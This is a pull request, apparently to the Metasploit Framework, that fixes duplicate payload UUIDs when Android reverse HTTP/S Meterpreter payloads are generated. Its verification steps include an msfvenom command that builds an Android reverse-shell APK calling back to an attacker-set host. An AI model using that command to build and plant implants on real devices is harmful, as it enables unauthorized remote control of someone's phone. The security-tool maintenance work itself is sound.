### PR TITLE
prevent duplicate UUIDs when generating Android HTTP/S payloads

### DIFF
--- a/lib/msf/core/payload/android/reverse_http.rb
+++ b/lib/msf/core/payload/android/reverse_http.rb
@@ -26,6 +26,7 @@ module Payload::Android::ReverseHttp
   end
 
   def generate_config(opts={})
+    opts[:uuid] ||= generate_payload_uuid
     opts[:uri] ||= luri + generate_uri(opts)
     super(opts)
   end
@@ -46,7 +47,7 @@ module Payload::Android::ReverseHttp
       raise ArgumentError, "Minimum StagerURILength is 5"
     end
 
-    generate_uri_uuid_mode(:init_java, uri_req_len)
+    generate_uri_uuid_mode(:init_java, uri_req_len, uuid: opts[:uuid])
   end
 
   #

--- a/lib/msf/core/payload/uuid/options.rb
+++ b/lib/msf/core/payload/uuid/options.rb
@@ -30,7 +30,7 @@ module Msf::Payload::UUID::Options
   # @param len [Fixnum] The length of the URI not including the leading slash, optionally nil for random
   # @return [String] A URI with a leading slash that hashes to the checksum, with an optional UUID
   #
-  def generate_uri_uuid_mode(mode,len=nil)
+  def generate_uri_uuid_mode(mode, len = nil, uuid: nil)
     sum = uri_checksum_lookup(mode)
 
     # The URI length may not have room for an embedded UUID
@@ -42,7 +42,7 @@ module Msf::Payload::UUID::Options
       return "/" + generate_uri_checksum(sum, len, prefix="")
     end
 
-    uuid = generate_payload_uuid
+    uuid ||= generate_payload_uuid
     uri  = generate_uri_uuid(sum, uuid, len)
     record_payload_uuid_url(uuid, uri)
 


### PR DESCRIPTION
Fixes #7745 

When we generate the android payload config block, we generate a payload UUID and it gets stored in payloads.json. However, right after we generate the URI, which also generates a payload UUID. This adjusts generate_uri_uuid_mode so it can optionally take a UUID if one has already been generated for the payload.

## Verification

List the steps needed to make sure this thing works

- [x] Generate an android HTTP payload with a UUID, e.g.:
```
./msfvenom -p android/meterpreter/reverse_http PayloadUUIDTracking=true PayloadUUIDName=test LURI=/test/ LHOST=$LHOST -o android.apk
```
- [x] Start a listener and verify that you can use and interact with the session
- [x] Verify that ~/.msf4/payloads.json only has one entry
- [x] Verify that the similar payloads for windows/python meterpreter still work as expected.

I was able to easily see how Android payloads were generating twice, but it was harder to see why other payloads were not. I implemented this since it seemed weird to not just pass the UUID into other functions after it is generated, but maybe this needs more thought as to a unified approach across payloads.